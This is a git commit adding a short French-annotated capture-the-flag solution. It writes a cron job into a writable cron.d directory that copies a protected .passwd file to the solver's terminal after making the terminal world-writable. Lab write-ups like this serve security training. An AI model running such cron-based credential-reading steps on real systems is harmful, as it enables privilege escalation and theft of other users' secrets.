nouveaux challenges

This commit is contained in:
2023-02-13 23:59:04 +01:00
parent 167315e9b1
commit 697912fcd2
4 changed files with 37 additions and 0 deletions

View File

@ -0,0 +1,7 @@
tty
=> /dev/pts/x
chmod 666 /dev/pts/x
echo 'cat .passwd > /dev/pts/x' > cron.d/vverdier
chmod 777 cron.d/vverdier
Attendre que le script s'exécute !